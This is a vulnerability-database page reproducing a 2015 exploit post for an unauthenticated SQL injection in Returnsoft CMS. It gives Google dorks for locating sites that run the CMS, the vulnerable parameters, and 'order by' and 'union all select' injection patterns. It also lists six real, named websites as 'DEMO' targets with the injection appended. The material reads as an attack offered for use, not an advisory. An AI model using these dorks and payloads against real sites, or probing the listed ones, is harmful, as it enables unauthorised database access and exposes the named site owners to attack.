Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtShelesh Rauthan1337DAY-ID-24217
HistorySep 08, 2015 - 12:00 a.m.

Returnsoft CMS - SQL Injection Vulnerability

2015-09-0800:00:00
Shelesh Rauthan
0day.today
33
JSON

Exploit for php platform in category web applications

==========================================================
[+] Title                 :- Returnsoft CMS - SQL Injection Vulnerability 
[+] Date                  :- 9 - Sep - 2015
[+] Vendor Homepage       :- http://returnsoft.info/
[+] Version               :- All Versions
[+] Tested on             :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category              :- webapps
[+] Google Dorks          :- "Developed by Returnsoft"
                             "Developed by Returnsoft" +inurl:/.php?id=
                             "Developed by Returnsoft" inurl:"php?id="                         
[+] Exploit Author        :- Shelesh Rauthan (ShOrTy420 aKa [email protected])
[+] Team name             :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website      :- serverfarming.com, intelligentexploit.com
[+] The official Members  :- Sh0rTy420, [email protected]$, !nfIn!Ty, Th3G0v3Rn3R, m777k
[+] Greedz to             :- @@lu, Lalit, MyLappy<3, Diksha
[+] Contact               :- fb.com/shelesh.rauthan, [email protected], [email protected]

=========================================================
[+] Severity Level          :- High

[+] Request Method(s)       :- GET / POST

[+] Vulnerable Parameter(s) :- id, pid, cid

[+] Affected Area(s)        :- Entire admin, database, Server

[+] About                   :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File     :- /home/DOMAIN/public_html/XXX.php
                              
[+] POC                     :- http://127.0.0.1/XXX.php?id=[SQL]'

The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.


http://www.[WEBSITE].com/video.php?id=4' order by [SQL IN4JECTION]--+
http://www.[WEBSITE].com/video.php?id=4' union all select [SQL INJECTION]--+



[+] DEMO :-   http://www.rerukanemahanahimi.lk/gallery-one.php?id=4'
              http://movistar.lk/show.php?id=1192'
              http://senpathi.lk/show.php?id=64'
              http://www.col3neg9.org/more_clips.php?name=tvchanels'
              http://www.sithmakiri.com/news/show.php?id=5764'
              http://9lanka.com/hot_lanka/show.php?id=730'

#  0day.today [2018-03-20]  #
JSON